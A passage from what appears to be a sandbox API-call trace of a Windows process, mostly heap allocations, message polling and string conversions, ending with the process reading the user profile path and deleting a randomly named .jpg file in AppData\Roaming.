lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.877] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.877] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.877] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.877] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.877] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.877] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0196.877] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0196.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0196.879] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0196.879] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.879] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.879] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.879] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.880] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.880] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.880] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.880] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.880] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.880] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.880] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.919] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.920] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0196.920] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.920] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0196.920] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.920] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.920] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.920] CryptReleaseContext (hProv=0xad6480, dwFlags=0x0) returned 1 [0196.920] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.920] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.920] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.920] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.920] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.920] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0196.920] FreeLibrary (hLibModule=0x74d40000) returned 1 [0196.921] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.921] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.921] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.921] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.921] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.922] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.922] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0196.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0196.922] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0196.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0196.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0196.923] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0196.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0196.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0196.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0196.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.923] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.923] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0196.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0196.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0196.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0196.924] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24f1fe0 [0196.924] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/dunBms1jB_.jpg", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dunBms1jB_.jpg", lpFilePart=0x8bedfc*="dunBms1jB_.jpg") returned 0x3c [0196.924] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0196.924] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dunBms1jB_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dunbms1jb_.jpg")) returned 0x2020 [0196.924] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dunBms1jB_.jpg", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1dd9ae10, ftCreationTime.dwHighDateTime=0x1d4ca95, ftLastAccessTime.dwLowDateTime=0xb0f4f2d0, ftLastAccessTime.dwHighDateTime=0x1d4c749, ftLastWriteTime.dwLowDateTime=0xb0f4f2d0, ftLastWriteTime.dwHighDateTime=0x1d4c749, nFileSizeHigh=0x0, nFileSizeLow=0x7315, dwReserved0=0x9cf, dwReserved1=0x4, cFileName="dunBms1jB_.jpg", cAlternateFileName="DUNBMS~1.JPG")) returned 0xaa5660 [0196.925] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dunBms1jB_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dunbms1jb_.jpg")) returned 1 [0196.926] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1dd9ae10, ftCreationTime.dwHighDateTime=0x1d4ca95, ftLastAccessTime.dwLowDateTime=0xb0f4f2d0, ftLastAccessTime.dwHighDateTime=0x1d4c749, ftLastWriteTime.dwLowDateTime=0xb0f4f2d0, ftLastWriteTime.dwHighDateTime=0x1d4c749, nFileSizeHigh=0x0, nFileSizeLow=0x7315, dwReserved0=0x9cf, dwReserved1=0x4, cFileName="dunBms1jB_.jpg", cAlternateFileName="DUNBMS~1.JPG")) returned 0 [0196.926] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0196.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.926] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0196.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0196.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.926] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0196.926] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0196.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0196.927] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0196.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0196.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0196.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0196.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.927] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0196.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0196.927] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0196.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0196.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0196.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.927] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0196.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0196.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0196.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0196.928] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.928] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0196.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0196.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.929] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7a) returned 0x24f1fe0 [0196.929] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 